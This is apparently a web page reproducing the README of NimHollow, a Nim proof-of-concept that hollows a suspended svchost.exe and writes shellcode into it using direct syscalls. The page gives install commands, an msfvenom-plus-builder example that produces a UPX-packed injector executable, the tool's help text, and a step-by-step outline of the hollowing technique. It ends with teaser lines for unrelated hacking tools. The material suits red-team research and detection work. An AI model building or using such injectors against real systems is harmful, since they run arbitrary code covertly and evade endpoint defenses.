NimHollow is a Nim Implementation Of Process Hollowing Using Syscalls (PoC). Playing around with the Process Hollowing technique using Nim.
Features
DISCLAIMER. All information contained in this repository is provided for educational and research purposes only. The author is not responsible for any illegal use of this tool.
Installation
~$ git clone –recurse-submodules https://github.com/snovvcrash/NimHollow && cd NimHollow
~$ git submodule update –init –recursive
~$ nimble install winim nimcrypto
~$ pip3 install -r requirements.txt
~$ sudo apt install upx -y
Example
~$ msfvenom -p windows/x64/messagebox TITLE=’MSF’ TEXT=’Hack the Planet!’ EXITFUNC=thread -f raw -o shellcode.bin
~$ python3 NimHollow.py shellcode.bin -i ‘C:\Windows\System32\svchost.exe’ -o injector –upx –rm [–whispers2]
~$ file injector.exe
injector.exe: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Help
usage: NimHollow.py [-h] [-i IMAGE] [-o OUTPUT] [–whispers2] [–debug] [–upx] [–rm] shellcode_bin
positional arguments:
shellcode_bin path to the raw shellcode file
optional arguments:
-h, –help show this help message and exit
-i IMAGE, –image IMAGE
process image to hollow (default “C:\Windows\System32\svchost.exe”)
-o OUTPUT, –output OUTPUT
output filename
–whispers2 use NimlineWhispers2 to generate syscalls.nim
–debug do not strip debug messages from Nim binary
–upx compress Nim binary with upx
–rm remove Nim files after compiling the binary
Process Hollowing In Slides
1. Create the target process (e.g., svchost.exe
) in a suspended state.
2. Query created process to extract its base address pointer from PEB (Process Environment Block).
3. Read 8 bytes of memory (for 64-bit architecture) pointed by the image base address pointer in order to get the actual value of the image base address.
4. Read 0x200 bytes of the loaded EXE image and parse PE structure to get the EntryPoint address.
5. Write the shellcode to the EntryPoint address and resume thread execution.
Burrow is an open source tool for burrowing through firewalls, built by teenagers at Hack Club.…
Simple golang webserver that listens for basic auth or post requests and sends a notification…
Nutek Security Platform for macOS and Linux operating systems. Tools for hackers, bug hunters and…
Welcome to SecureSphere Labs, your go-to destination for a curated collection of powerful hacking tools…
All in one Docker-based workstation with hacking tools for Pentesting and offsec Labs by maintained…
Got it! Below is the updated README.md file with instructions for downloading the project on…